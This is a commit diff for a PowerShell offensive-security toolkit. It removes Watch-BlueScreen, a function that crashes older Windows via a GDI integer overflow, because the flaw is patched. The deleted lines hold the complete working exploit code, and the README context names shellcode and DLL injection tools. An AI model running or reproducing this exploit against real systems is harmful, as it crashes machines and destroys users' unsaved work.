Removing Watch-BlueScreen

This vulnerability was patched a while ago making this function largely
irrelevant.

3 files changed, 1 insertions, 83 deletions

diff --git a/CodeExecution/CodeExecution.psd1 b/CodeExecution/CodeExecution.psd1
index 07963fc..85258a5 100644
--- a/CodeExecution/CodeExecution.psd1
+++ b/CodeExecution/CodeExecution.psd1
@@ -74,7 +74,7 @@ ModuleList = @(@{ModuleName = 'CodeExecution'; ModuleVersion = '1.0.0.0'; GUID =
 
 # List of all files packaged with this module
 FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1', 
-               'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectivePEInjection.ps1', 'Watch-BlueScreen.ps1', 'Usage.md'
+               'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectivePEInjection.ps1', 'Usage.md'
 
 # Private data to pass to the module specified in RootModule/ModuleToProcess
 # PrivateData = ''
diff --git a/CodeExecution/Watch-BlueScreen.ps1 b/CodeExecution/Watch-BlueScreen.ps1
deleted file mode 100644
index 0a12a91..0000000
--- a/CodeExecution/Watch-BlueScreen.ps1
+++ /dev/null
@@ -1,78 +0,0 @@
-function Watch-BlueScreen
-{
-<#
-.SYNOPSIS
-
-    Cause a blue screen to occur (Windows 7 and below).
-
-    PowerSploit Function: Watch-BlueScreen
-    Author: Matthew Graeber (@mattifestation)
-    Original Research: Tavis Ormandy and Nikita Tarakanov
-    License: BSD 3-Clause
-    Required Dependencies: None
-    Optional Dependencies: None
-
-.NOTES
-
-    Tavis Ormandy documented this technique on 2/3/2013 and Nikita Tarakanov
-    ?tweeted this technique on 5/13/2013.
-
-.LINK
-
-    https://gist.github.com/taviso/4658638
-    http://blog.cmpxchg8b.com/2013/02/the-other-integer-overflow.html
-    https://twitter.com/NTarakanov/status/334031968465453057
-#>
-    [CmdletBinding( ConfirmImpact = 'High')] Param ()
-
-    try { $Gdi32 = [Gdi32] } catch [Management.Automation.RuntimeException]
-    {
-        $DynAssembly = New-Object System.Reflection.AssemblyName('BSOD')
-        $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, 'Run')
-        $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BSOD', $False)
-        $TypeBuilder = $ModuleBuilder.DefineType('Gdi32', 'Public, Class')
-
-        $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
-        $SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')
-        $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder( $DllImportConstructor, @('ntdll.dll'),
-                                                                                          [Reflection.FieldInfo[]]@($SetLastError), @($true))
-
-        $TypeBuilder.DefinePInvokeMethod( 'CreateCompatibleDC',
-                                          'Gdi32.dll',
-                                          'Public, Static',
-                                          'Standard',
-                                          [IntPtr],
-                                          @([IntPtr]),
-                                          'Winapi',
-                                          'Auto' ).SetCustomAttribute($SetLastErrorCustomAttribute)
-
-        $TypeBuilder.DefinePInvokeMethod( 'SetLayout',
-                                          'Gdi32.dll',
-                                          'Public, Static',
-                                          'Standard',
-                                          [UInt32],
-                                          @([IntPtr], [UInt32]),
-                                          'Winapi',
-                                          'Auto' ) | Out-Null
-
-        $TypeBuilder.DefinePInvokeMethod( 'ScaleWindowExtEx',
-                                          'Gdi32.dll',
-                                          'Public, Static',
-                                          'Standard',
-                                          [Bool],
-                                          @([IntPtr], [Int32], [Int32], [Int32], [Int32], [IntPtr]),
-                                          'Winapi',
-                                          'Auto' ) | Out-Null
-
-        $Gdi32 = $TypeBuilder.CreateType()
-    }
-
-    $LAYOUT_RTL = 1
-
-    if ($psCmdlet.ShouldContinue( 'Do you want to continue?', 'You may want to save your work before continuing.' ))
-    {
-        $DC = $Gdi32::CreateCompatibleDC([IntPtr]::Zero)
-        $Gdi32::SetLayout($DC, $LAYOUT_RTL) | Out-Null
-        $Gdi32::ScaleWindowExtEx($DC, [Int32]::MinValue, -1, 1, 1, [IntPtr]::Zero) | Out-Null
-    }
-}
diff --git a/README.md b/README.md
index 4f4a9ba..f2967fc 100644
--- a/README.md
+++ b/README.md
@@ -20,10 +20,6 @@ Injects shellcode into the process ID of your choosing or within PowerShell loca
 
 Execute shellcode within the context of the running PowerShell process without making any Win32 function calls.
 
-#### `Watch-BlueScreen`
-
-Cause a blue screen to occur (Windows 7 and below).
-
 ## ScriptModification
 
 **Modify and/or prepare scripts for execution on a compromised machine.**